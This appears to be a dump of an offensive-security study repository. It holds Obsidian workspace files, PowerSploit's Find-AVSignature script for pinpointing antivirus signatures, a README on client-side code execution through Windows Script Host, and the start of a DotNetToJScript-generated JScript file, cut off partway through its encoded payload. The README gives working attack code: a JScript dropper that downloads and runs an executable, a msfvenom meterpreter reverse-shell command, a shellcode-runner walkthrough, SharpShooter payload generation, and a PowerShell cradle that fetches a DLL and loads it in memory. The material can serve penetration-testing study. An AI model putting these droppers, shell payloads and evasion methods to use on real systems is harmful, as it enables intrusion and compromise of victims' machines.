"id": "a2b9ddd1c0938601", 93 | "type": "leaf", 94 | "state": { 95 | "type": "outgoing-link", 96 | "state": { 97 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 98 | "linksCollapsed": false, 99 | "unlinkedCollapsed": true 100 | } 101 | } 102 | }, 103 | { 104 | "id": "191b57f8adb803bd", 105 | "type": "leaf", 106 | "state": { 107 | "type": "tag", 108 | "state": { 109 | "sortOrder": "frequency", 110 | "useHierarchy": true 111 | } 112 | } 113 | }, 114 | { 115 | "id": "66d6162e78370ad7", 116 | "type": "leaf", 117 | "state": { 118 | "type": "outline", 119 | "state": { 120 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md" 121 | } 122 | } 123 | } 124 | ] 125 | } 126 | ], 127 | "direction": "horizontal", 128 | "width": 300, 129 | "collapsed": true 130 | }, 131 | "active": "ef4849ca2a3ccf14", 132 | "lastOpenFiles": [ 133 | "Client-Side-Code-Execution-With-Office/README.md", 134 | "Antivirus Evasion/README.md" 135 | ] 136 | } -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "580c51f730ae9f7d", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "056cede136aa8aca", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "6469b7a9940c7fb6", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "Advanced Antivirus Evasion/README.md", 17 | "mode": "source", 18 | "source": false 19 | } 20 | } 21 | } 22 | ] 23 | } 24 | ], 25 | "direction": "vertical" 26 | }, 27 | "left": { 28 | "id": "97d87bf82fdc3776", 29 | "type": "split", 30 | "children": [ 31 | { 32 | "id": "70d8ef3ca3469d01", 33 | "type": "tabs", 34 | "children": [ 35 | { 36 | "id": "ef4849ca2a3ccf14", 37 | "type": "leaf", 38 | "state": { 39 | "type": "file-explorer", 40 | "state": { 41 | "sortOrder": "byCreatedTimeReverse" 42 | } 43 | } 44 | }, 45 | { 46 | "id": "0a7aca5e57051a60", 47 | "type": "leaf", 48 | "state": { 49 | "type": "search", 50 | "state": { 51 | "query": "", 52 | "matchingCase": false, 53 | "explainSearch": false, 54 | "collapseAll": false, 55 | "extraContext": false, 56 | "sortOrder": "alphabetical" 57 | } 58 | } 59 | }, 60 | { 61 | "id": "4d9b2d9291ca8cd4", 62 | "type": "leaf", 63 | "state": { 64 | "type": "starred", 65 | "state": {} 66 | } 67 | }, 68 | { 69 | "id": "d033ac271bf2a2d3", 70 | "type": "leaf", 71 | "state": { 72 | "type": "bookmarks", 73 | "state": {} 74 | } 75 | } 76 | ] 77 | } 78 | ], 79 | "direction": "horizontal", 80 | "width": 307.5 81 | }, 82 | "right": { 83 | "id": "dabaab5abe0a3ea3", 84 | "type": "split", 85 | "children": [ 86 | { 87 | "id": "a39ebfa97e1e8971", 88 | "type": "tabs", 89 | "children": [ 90 | { 91 | "id": "d774fb5bd034abff", 92 | "type": "leaf", 93 | "state": { 94 | "type": "backlink", 95 | "state": { 96 | "file": "Advanced Antivirus Evasion/README.md", 97 | "collapseAll": false, 98 | "extraContext": false, 99 | "sortOrder": "alphabetical", 100 | "showSearch": false, 101 | "searchQuery": "", 102 | "backlinkCollapsed": false, 103 | "unlinkedCollapsed": true 104 | } 105 | } 106 | }, 107 | { 108 | "id": "a2b9ddd1c0938601", 109 | "type": "leaf", 110 | "state": { 111 | "type": "outgoing-link", 112 | "state": { 113 | "file": "Advanced Antivirus Evasion/README.md", 114 | "linksCollapsed": false, 115 | "unlinkedCollapsed": true 116 | } 117 | } 118 | }, 119 | { 120 | "id": "191b57f8adb803bd", 121 | "type": "leaf", 122 | "state": { 123 | "type": "tag", 124 | "state": { 125 | "sortOrder": "frequency", 126 | "useHierarchy": true 127 | } 128 | } 129 | }, 130 | { 131 | "id": "66d6162e78370ad7", 132 | "type": "leaf", 133 | "state": { 134 | "type": "outline", 135 | "state": { 136 | "file": "Advanced Antivirus Evasion/README.md" 137 | } 138 | } 139 | }, 140 | { 141 | "id": "4bc051a603902373", 142 | "type": "leaf", 143 | "state": { 144 | "type": "calendar", 145 | "state": {} 146 | } 147 | } 148 | ], 149 | "currentTab": 4 150 | } 151 | ], 152 | "direction": "horizontal", 153 | "width": 326.5 154 | }, 155 | "left-ribbon": { 156 | "hiddenItems": { 157 | "switcher:Open quick switcher": false, 158 | "graph:Open graph view": false, 159 | "canvas:Create new canvas": false, 160 | "daily-notes:Open today's daily note": false, 161 | "templates:Insert template": false, 162 | "command-palette:Open command palette": false, 163 | "table-editor-obsidian:Advanced Tables Toolbar": false 164 | } 165 | }, 166 | "active": "6469b7a9940c7fb6", 167 | "lastOpenFiles": [ 168 | "2023-06-01.md", 169 | "Advanced Antivirus Evasion/README.md", 170 | "README.md", 171 | "Process Injection and Migration/README.md", 172 | "Client-Side-Code-Execution-With-Office/README.md", 173 | "Operating-System-and-Programming-Fundamentals/README.md", 174 | "Client-Side-Execution-With-Windows-Script-Host/README.md", 175 | "Antivirus Evasion/README.md" 176 | ] 177 | } -------------------------------------------------------------------------------- /Tools/AV Evasion/Find-AVSignature.ps1: -------------------------------------------------------------------------------- 1 | function Find-AVSignature 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Locate tiny AV signatures. 7 | 8 | PowerSploit Function: Find-AVSignature 9 | Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com. 17 | 18 | .PARAMETER Startbyte 19 | 20 | Specifies the first byte to begin splitting on. 21 | 22 | .PARAMETER Endbyte 23 | 24 | Specifies the last byte to split on. 25 | 26 | .PARAMETER Interval 27 | 28 | Specifies the interval size to split with. 29 | 30 | .PARAMETER Path 31 | 32 | Specifies the path to the binary you want tested. 33 | 34 | .PARAMETER OutPath 35 | 36 | Optionally specifies the directory to write the binaries to. 37 | 38 | .PARAMETER BufferLen 39 | 40 | Specifies the length of the file read buffer . Defaults to 64KB. 41 | 42 | .PARAMETER Force 43 | 44 | Forces the script to continue without confirmation. 45 | 46 | .EXAMPLE 47 | 48 | Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe 49 | Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose 50 | Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose 51 | Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose 52 | Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose 53 | 54 | .NOTES 55 | 56 | Several of the versions of "DSplit.exe" available on the internet contain malware. 57 | 58 | .LINK 59 | 60 | http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html 61 | https://github.com/mattifestation/PowerSploit 62 | http://www.exploit-monday.com/ 63 | http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 64 | #> 65 | 66 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 67 | [CmdletBinding()] 68 | Param( 69 | [Parameter(Mandatory = $True)] 70 | [ValidateRange(0,4294967295)] 71 | [UInt32] 72 | $StartByte, 73 | 74 | [Parameter(Mandatory = $True)] 75 | [String] 76 | $EndByte, 77 | 78 | [Parameter(Mandatory = $True)] 79 | [ValidateRange(0,4294967295)] 80 | [UInt32] 81 | $Interval, 82 | 83 | [String] 84 | [ValidateScript({Test-Path $_ })] 85 | $Path = ($pwd.path), 86 | 87 | [String] 88 | $OutPath = ($pwd), 89 | 90 | [ValidateRange(1,2097152)] 91 | [UInt32] 92 | $BufferLen = 65536, 93 | 94 | [Switch] $Force 95 | ) 96 | 97 | #test variables 98 | if (!(Test-Path $Path)) {Throw "File path not found"} 99 | $Response = $True 100 | if (!(Test-Path $OutPath)) { 101 | if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory} 102 | } 103 | if (!$Response) {Throw "Output path not found"} 104 | if (!(Get-ChildItem $Path).Exists) {Throw "File not found"} 105 | [Int32] $FileSize = (Get-ChildItem $Path).Length 106 | if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"} 107 | [Int32] $MaximumByte = (($FileSize) - 1) 108 | if ($EndByte -ceq "max") {$EndByte = $MaximumByte} 109 | 110 | #Recast $Endbyte into an Integer so that it can be compared properly. 111 | [Int32]$EndByte = $EndByte 112 | 113 | #If $Endbyte is greater than the file Length, use $MaximumByte. 114 | if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte} 115 | 116 | #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte. 117 | if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval} 118 | 119 | Write-Verbose "StartByte: $StartByte" 120 | Write-Verbose "EndByte: $EndByte" 121 | 122 | #find the filename for the output name 123 | [String] $FileName = (Split-Path $Path -leaf).Split('.')[0] 124 | 125 | #Calculate the number of binaries 126 | [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval) 127 | if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)} 128 | 129 | #Prompt user to verify parameters to avoid writing binaries to the wrong directory 130 | $Response = $True 131 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!", 132 | "Do you want to continue?"))){} 133 | if (!$Response) {Return} 134 | 135 | Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." 136 | [Int32] $Number = [Math]::Floor($Endbyte/$Interval) 137 | 138 | #Create a Read Buffer and Stream. 139 | #Note: The Filestream class takes advantage of internal .NET Buffering. We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc. 140 | [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen 141 | [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen) 142 | 143 | #write out the calculated number of binaries 144 | [Int32] $i = 0 145 | for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++) 146 | { 147 | # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval 148 | if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte} 149 | else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))} 150 | 151 | Write-Verbose "Byte 0 -> $($SplitByte)" 152 | 153 | #Reset ReadStream to beginning of file 154 | $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null 155 | 156 | #Build a new FileStream for Writing 157 | [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin" 158 | [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen) 159 | 160 | [Int32] $BytesLeft = $SplitByte 161 | Write-Verbose "$($WriteStream.name)" 162 | 163 | #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer 164 | while ($BytesLeft -gt $BufferLen){ 165 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen) 166 | $WriteStream.Write($ReadBuffer, 0, $count) 167 | $BytesLeft = $BytesLeft - $count 168 | } 169 | 170 | #Write the remaining bytes to the file 171 | do { 172 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft) 173 | $WriteStream.Write($ReadBuffer, 0, $count) 174 | $BytesLeft = $BytesLeft - $count 175 | } 176 | until ($BytesLeft -eq 0) 177 | $WriteStream.Close() 178 | $WriteStream.Dispose() 179 | } 180 | Write-Verbose "Files written to disk. Flushing memory." 181 | $ReadStream.Dispose() 182 | 183 | #During testing using large binaries, memory usage was excessive so lets fix that 184 | [System.GC]::Collect() 185 | Write-Verbose "Completed!" 186 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/README.md: -------------------------------------------------------------------------------- 1 | # Basic Dropper in JScript 2 | 3 | - To perform a HTTP GET Request, we can use the MSXML2.XMLHTTP Object which is based on Microsoft XML Core Services. 4 | - We would be using CreateObject method of the Windows Script Host to instantiate the MSXML2.XMLHTTP Object. 5 | 6 | JScript Code : 7 | 8 | var url = "" 9 | var Object = WScript.CreateObject('MSXML2.XMLHTTP'); 10 | Object.Open('GET', url, false); 11 | Object.Send(); 12 | if (Object.Status == 200) 13 | { 14 | var Stream = WScript.CreateObject('ADODB.Stream'); 15 | Stream.Open(); 16 | Stream.Type = 1; 17 | Stream.Write(Object.ResponseBody); 18 | Stream.Position = 0; 19 | Stream.SaveToFile("met.exe", 2); 20 | Stream.Close(); 21 | } 22 | var r = new ActiveXObject("WScript.Shell").Run("met.exe"); 23 | 24 | Explanation : 25 | 26 | 1. We first store the link to the exe file in a variable called url 27 | 2. Next we create the Object of MSXML2.XMLHTTP 28 | 3. We then create a GET Request to the link 29 | 4. Next we send the GET request with Object.Send() command. 30 | 5. If the Object Status is 200, that means it was a success and the file was found. 31 | 6. We then create a Stream to copy the response into it and save it to a file 32 | 7. Using the _ActiveXObject_, we execute a shell command were we execute the exe file. 33 | 34 |   35 | 36 | > Documentation : 37 | > 38 | > - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms767625%28v%3dvs.85%29 39 | > - https://www.w3schools.com/asp/ado_ref_stream.asp 40 | > - https://en.wikipedia.org/wiki/ActiveX 41 | 42 |   43 | 44 | # JScript and C# 45 | 46 | Just as we did in the previous topics of Invoking Win32 APIs from C# and integrating it in powershell or VBA Script, we will follow a similar approach here. 47 | 48 | A Simple Hello World Program can be found [here](./C%23%20Programs/HelloWorld.cs) 49 | 50 | Explanation : 51 | 52 | 1. We first import the required libraries in C#. 53 | 2. We then specify the namespace HelloWorld 54 | 3. We then specify the classname followed by the Main function. 55 | 4. Using the Console.WriteLine method, we can print the text to console. 56 | 57 | Compiled exe file can be found [here](./Compiled%20binaries/HelloWorld.exe) 58 | 59 |   60 | 61 | > Namespaces in C# are used to organize too many classes so that it can be easy to handle the application. In a simple C# program, we use System.Console where System is the namespace and Console is the class. To access the class of a namespace, we need to use namespacename.classname 62 | 63 | > Documentation : 64 | > 65 | > - https://docs.microsoft.com/en-us/dotnet/api/system.console.writeline?view=netframework-4.8 66 | 67 | > Visual Studio > Console (.Net Framwork) template > Build > exe file 68 | 69 |   70 | 71 | # DotNetToJScript 72 | 73 | A project created by James Forshaw in 2017 to execute C# assembly from JScript. 74 | 75 | Github Project : https://github.com/tyranid/DotNetToJScript 76 | 77 | We can download the latest release. The file also has an example compiled dll file which we can use for testing. 78 | 79 | The command for compiling the dll to js file is : 80 | 81 | ![DotNetToJscript](./images/DotNetToJscript.png) 82 | 83 | Source Code of ExampleAssembly can be found [here](./C%23%20Programs/ExampleAssembly.cs) 84 | Compiled DLL can be found [here](./Compiled%20binaries/ExampleAssembly.dll) 85 | 86 | Explanation : 87 | 88 | 1. The first function sets the version of the .Net framwork 89 | 2. The second function is empty as we did not set the -d flag in DotNetToJscript 90 | 3. The next function base64ToStream converts a base64 shellcode to Data stream. 91 | 4. The serialized_obj variable stores the serialized base64 blob 92 | 5. The entry_class variable stores the name of the class which we want to execute. 93 | 6. We then call the setversion() function and the base64ToStream() function 94 | 7. The BinaryFormatter object is instantiated from which we call the deserialize method to deserialize the Serialized blob. 95 | 8. We then execute relevant methods using the DynamicInvoke and CreateInstance methods. 96 | 9. At last we execute the constructor with the help of CreateInstance. 97 | 98 |   99 | 100 | # Win32 API calls from C# 101 | 102 | - Here we can import the Win32 API using the P/Invoke import statements. 103 | - Unlike what was done in powershell, in C# we can directly compile the assembly before sending it to the victim and hence it would get loaded to the memory directly. 104 | 105 | Code to execute a simple MessageBox Win32 API can be found [here](./C%23%20Programs/MessageBox.cs) 106 | 107 | Compiled source code in exe format can be found [here](./Compiled%20binaries/MessageBox.exe) 108 | 109 | Explanation : 110 | 111 | 1. First the required libraries are imported. 112 | 2. We then give a name to the namespace and create a class inside that. 113 | 3. The import statement can be found in the https://www.pinoke.net website. 114 | 4. The Main method has the Win32 API method which pops a message box. 115 | 116 |   117 | 118 | # Shellcode runner in C# using Win32 API 119 | 120 | We would be using the same methodology as the previous shellcodes. First we would allocate memory, copy the shellcode to it and then create a thread to execute it. 121 | 122 | Msfvenom command : 123 | 124 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f csharp EXITFUNC=thread 125 | 126 | ![msfvenom](./images/msfvenom.png) 127 | 128 |   129 | 130 | C# Code can be found [here](./C%23%20Programs/ShellcodeRunner.cs) 131 | 132 | EXE file can be found [here](./Compiled%20binaries/ShellcodeRunner.exe) 133 | 134 | Explanation : 135 | 136 | 1. We first import the namespaces containing important system classes 137 | 2. We then specify the namespace and the classname of this project 138 | 3. Import the win32 APIs using the P/Invoke Statements 139 | 4. Store the shellcode in a variable 140 | 5. Allocate memory using the _VirtualAlloc_ by specifying the required size, allocation type and protections. 141 | 6. Copy the shellcode into the newly created memory by using the Copy() method. 142 | 7. Execute the memory by using the _CreateThread_ Win32 API 143 | 8. Use the _WaitForSingleObject_ Win32 API to stop the program from quitting immediately and wait for a shell exit to quit. 144 | 145 | > In-Depth explanation of the used Win32 APIs can be found [here](./../Client-Side-Code-Execution-With-Office/README.md#in-memory-shellcode-runner-in-vba) 146 | 147 |   148 | 149 | # Jscript Shellcode Runner 150 | 151 | C# code can be found [here](./C%23%20Programs/JscriptShellcode.cs) 152 | 153 | Compiled DLL can be found [here](./Compiled%20binaries/JscriptShellcode.dll) 154 | 155 | Jscript can be found [here](./JScript/JscriptShellcode.js) 156 | 157 | Explanation: 158 | 159 | 1. The procedure is the same as what happened in the C# shellcode execution. 160 | 2. Here we set the ComVisible to true. This basically acts as a whitelist by preventing unnecessary exposure to COM 161 | 3. It is important to make it public or else we would not be able to interact with the Component Object Model(COM) 162 | 4. The remaining statements have alread been explained in the previous topic. 163 | 164 | DotNetToJscript command : 165 | 166 | ![JscriptShellcode](./images/JscriptShellcode.png) 167 | 168 |   169 | 170 | > Documentation : 171 | > 172 | > - https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.comvisibleattribute?redirectedfrom=MSDN&view=net-6.0 173 | > - https://stackoverflow.com/questions/15688395/whats-the-deal-with-comvisible-default-and-public-classes-com-exposure 174 | > - https://www.whiteoaksecurity.com/blog/2020-1-23-advanced-ttps-dotnettojscript-part-2/ 175 | 176 |   177 | 178 | # SharpShooter 179 | 180 | - A tool called SharpShooter can be used for payload generation of C# source code. 181 | - It leverages James Forshaw's DotNetToJScript 182 | - Github : https://github.com/mdsecactivebreach/SharpShooter 183 | - Example command : 184 | 185 | ``` 186 | python SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile --output 187 | ``` 188 | 189 |   190 | 191 | # Reflective Load of Win32 API for In-Memory Powershell 192 | 193 | The C# source code can be found [here](./C%23%20Programs/ReflectiveLoad.cs) 194 | 195 | The compiled DLL can be found [here](./Compiled%20binaries/ReflectiveLoad.dll) 196 | 197 | Powershell script : 198 | 199 | $data = (New-Object System.Net.WebClient).DownloadData('') 200 | $assem = [System.Reflection.Assembly]::Load($data) 201 | $class = $assem.GetType(".") 202 | $method = $class.GetMethod("") 203 | $method.Invoke(0, $null) 204 | 205 |   206 | 207 | Explanation : 208 | 209 | 1. We first download the data of the hosted dll and store it in a variable 210 | 2. We load the assembly in-memory using the Load() method from System.Reflection.Assembly 211 | 3. We interact with the loaded DLL using the GetType and GetMethod functions. 212 | 4. We then invoke the method hence executing the code in memory. 213 | 214 |   215 | 216 | > Documentation : 217 | > 218 | > - https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load?view=netframework-4.8 219 | > - https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=netframework-4.8 220 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/JScript/ExampleAssembly.js: -------------------------------------------------------------------------------- 1 | function setversion() { 2 | new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; 3 | } 4 | function debug(s) {} 5 | function base64ToStream(b) { 6 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 7 | var length = enc.GetByteCount_2(b); 8 | var ba = enc.GetBytes_4(b); 9 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 10 | ba = transform.TransformFinalBlock(ba, 0, length); 11 | var ms = new ActiveXObject("System.IO.MemoryStream"); 12 | ms.Write(ba, 0, (length / 4) * 3); 13 | ms.Position = 0; 14 | return ms; 15 | } 16 | 17 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 18 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 19 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 20 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 21 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 22 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 23 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 24 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 25 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 26 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 27 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 28 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 29 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 30 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 31 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 32 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 33 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 34 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 35 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 36 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 37 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 38 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 39 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 40 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAeZx0WgAAAAAA"+ 41 | "AAAA4AAiIAsBMAAACgAAAAgAAAAAAAAWKAAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 42 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAxCcA"+ 43 | "AE8AAAAAQAAADAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAIwmAAAcAAAAAAAAAAAAAAAAAAAA"+ 44 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 45 | "AAAALnRleHQAAAAcCAAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAADAQAAABA"+ 46 | "AAAABgAAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+ 47 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPgnAAAAAAAASAAAAAIABQB0IAAAGAYAAAEAAAAAAAAA"+ 48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagIoDgAACnIB"+ 49 | "AABwcgEAAHAWHzAoDwAACiYqIgMoEAAACiYqQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAA"+ 50 | "BQBsAAAABAIAACN+AABwAgAAgAIAACNTdHJpbmdzAAAAAPAEAAAMAAAAI1VTAPwEAAAQAAAAI0dV"+ 51 | "SUQAAAAMBQAADAEAACNCbG9iAAAAAAAAAAIAAAFHFQAACQAAAAD6ATMAFgAAAQAAABQAAAACAAAA"+ 52 | "AgAAAAEAAAAQAAAADgAAAAEAAAADAAAAAABkAQEAAAAAAAYA1ADYAQYAQQHYAQYAIQCmAQ8A+AEA"+ 53 | "AAYASQCOAQYAtwCOAQYAmACOAQYAKAGOAQYA9ACOAQYADQGOAQYAYACOAQYANQC5AQYAEwC5AQYA"+ 54 | "ewCOAQYAQwJ4AQoAYgIHAgoASgIHAgoAHAIHAgoAfwEHAg4AOwKmAQAAAAABAAAAAAABAAEAAQAQ"+ 55 | "AC4CAAA9AAEAAQBQIAAAAACGGKABBgABAGsgAAAAAIYAOAIQAAEAAAABAF8BCQCgAQEAEQCgAQYA"+ 56 | "GQCgAQoAKQCgARAAMQCgARAAOQCgARAAQQCgARAASQCgARAAUQCgARAAWQCgARAAYQCgARUAaQCg"+ 57 | "ARAAcQCgARAAeQCgAQYAgQBdAhoAoQBXAiUALgALADQALgATAD0ALgAbAFwALgAjAGUALgArAHoA"+ 58 | "LgAzAKQALgA7AKQALgBDAGUALgBLAKoALgBTAKQALgBbAKQALgBjAM8ALgBrAPkAQwBbAAYBBIAA"+ 59 | "AAEAAAAAAAAAAAAAAAAAbQIAAAIAAAAAAAAAAAAAACsACgAAAAAAAgAAAAAAAAAAAAAAKwAHAgAA"+ 60 | "AAACAAAAAAAAAAAAAAArAHgBAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAEd1aWRBdHRyaWJ1dGUA"+ 61 | "RGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRy"+ 62 | "aWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJp"+ 63 | "YnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0"+ 64 | "dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0"+ 65 | "dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1"+ 66 | "dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcGF0aABFeGFtcGxlQXNzZW1ibHkuZGxs"+ 67 | "AFN5c3RlbQBNZXNzYWdlQm94SWNvbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlh"+ 68 | "Z25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNv"+ 69 | "bXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAU3lzdGVtLldpbmRvd3MuRm9ybXMATWVzc2Fn"+ 70 | 